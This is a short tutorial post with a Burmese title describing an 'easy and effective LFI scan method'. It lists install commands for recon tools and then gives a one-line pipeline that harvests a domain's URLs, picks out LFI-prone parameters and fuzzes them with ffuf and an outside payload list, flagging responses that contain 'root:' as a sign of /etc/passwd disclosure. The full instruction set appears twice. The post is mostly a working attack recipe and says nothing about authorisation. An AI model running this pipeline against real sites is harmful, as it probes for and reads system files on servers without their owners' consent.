အရမ်းလွယ်ကူပြီး ထိရောက်တဲ့ LFI Scan နည်းစနစ်
Run : sudo apt update
Run : sudo apt upgrade -y
Run : sudo apt install golang
install qsreplace ==> https://github.com/tomnomnom/qsreplace
Run : go install github.com/tomnomnom/qsreplace@latest
Run : cp ~/go/bin/qsreplace /usr/bin/
install gif tool ==> https://github.com/tomnomnom/gf
Run : go get -u github.com/tomnomnom/gf
Run : echo 'source $GOPATH/src/github.com/tomnomnom/gf/gf-completion.bash' >> ~/.bashrc
Run : cp ~/go/bin/gf /usr/bin/
Install urldedupe
Run : git clone https://github.com/ameenmaali/urldedupe.git
Run : cd urldedupe
Run : cmake CMakeLists.txt
Run : make
Run : cp urldedupe /usr/bin/
Download LFI payload file ==> https://github.com/coffinsp/payloads
Finally Run Comment ..
Run : echo www.example.com | gau | urldedupe -qs | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:" -v; done
Run : sudo apt update
Run : sudo apt upgrade -y
Run : sudo apt install golang
install qsreplace ==> https://github.com/tomnomnom/qsreplace
Run : go install github.com/tomnomnom/qsreplace@latest
Run : cp ~/go/bin/qsreplace /usr/bin/
install gif tool ==> https://github.com/tomnomnom/gf
Run : go get -u github.com/tomnomnom/gf
Run : echo 'source $GOPATH/src/github.com/tomnomnom/gf/gf-completion.bash' >> ~/.bashrc
Run : cp ~/go/bin/gf /usr/bin/
Install urldedupe
Run : git clone https://github.com/ameenmaali/urldedupe.git
Run : cd urldedupe
Run : cmake CMakeLists.txt
Run : make
Run : cp urldedupe /usr/bin/
Download LFI payload file ==> https://github.com/coffinsp/payloads
Finally Run Comment ..
Run : echo www.example.com | gau | urldedupe -qs | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:" -v; done
Tags:
Tools